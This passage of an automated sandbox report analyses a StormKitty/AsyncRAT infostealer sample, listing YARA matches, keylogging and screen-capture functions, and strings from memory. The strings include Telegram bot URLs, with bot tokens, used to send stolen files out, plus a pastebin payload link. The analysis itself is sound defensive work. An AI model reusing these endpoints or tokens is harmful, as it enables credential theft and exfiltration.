                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                              Source: vYz1Z2heor.exeString found in binary or memory: https://api.telegram.org/bot
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=57954
                              Source: vYz1Z2heor.exeString found in binary or memory: https://api.telegram.org/file/bot
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: vYz1Z2heor.exeString found in binary or memory: https://github.com/LimerBoy/StormKitty
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                              Source: vYz1Z2heor.exeString found in binary or memory: https://pastebin.com/raw/7B75u64B
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/7B7P
                              Source: vYz1Z2heor.exeString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                              Source: tmpD724.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
                              Source: tmpD724.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: tmpD724.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: tmpD724.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
                              Source: tmpD724.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                              Source: tmpD724.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                              Source: History.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
                              Source: places.raw.0.dr, tmpD724.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: tmpD724.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: places.raw.0.dr, tmpD724.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                              Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.10:49702 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49703 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49709 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Contains functionality to capture screen (.Net source)
                              Source: vYz1Z2heor.exe, DesktopScreenshot.cs.Net Code: Make
                              Contains functionality to log keystrokes (.Net Source)
                              Source: vYz1Z2heor.exe, Keylogger.cs.Net Code: SetHook
                              Source: vYz1Z2heor.exe, Keylogger.cs.Net Code: KeyboardLayout

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Modifies existing user documents (likely ransomware behavior)
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.docxJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\KLIZUSIQEN.jpgJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\PALRGUCVEH.docxJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\ZGGKNSUKOP.xlsxJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KLIZUSIQEN.jpgJump to behavior

                              System Summary

                              barindex
                              Malicious sample detected (through community Yara rule)
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                              Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                              Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                              Source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_00C163900_2_00C16390
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_00C15AC00_2_00C15AC0
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_00C197500_2_00C19750
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_00C197600_2_00C19760
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_00C157780_2_00C15778
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_051805FF0_2_051805FF
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_051806000_2_05180600
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_0518C1080_2_0518C108
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_0518C0F70_2_0518C0F7
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_05185D520_2_05185D52
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_05185D600_2_05185D60
                              Source: vYz1Z2heor.exe, 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameClient.exe. vs vYz1Z2heor.exe
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833157205.000000000076E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs vYz1Z2heor.exe
                              Source: vYz1Z2heor.exeBinary or memory string: OriginalFilenameClient.exe. vs vYz1Z2heor.exe
                              Source: vYz1Z2heor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                              Source: vYz1Z2heor.exe, type: SAMPLEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                              Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                              Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                              Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                              Source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                              Source: vYz1Z2heor.exe, Settings.csBase64 encoded string: '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
                              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@17/90@6/5
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile created: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802caJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeMutant created: NULL
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD5A3.tmpJump to behavior
                              Source: vYz1Z2heor.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: vYz1Z2heor.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
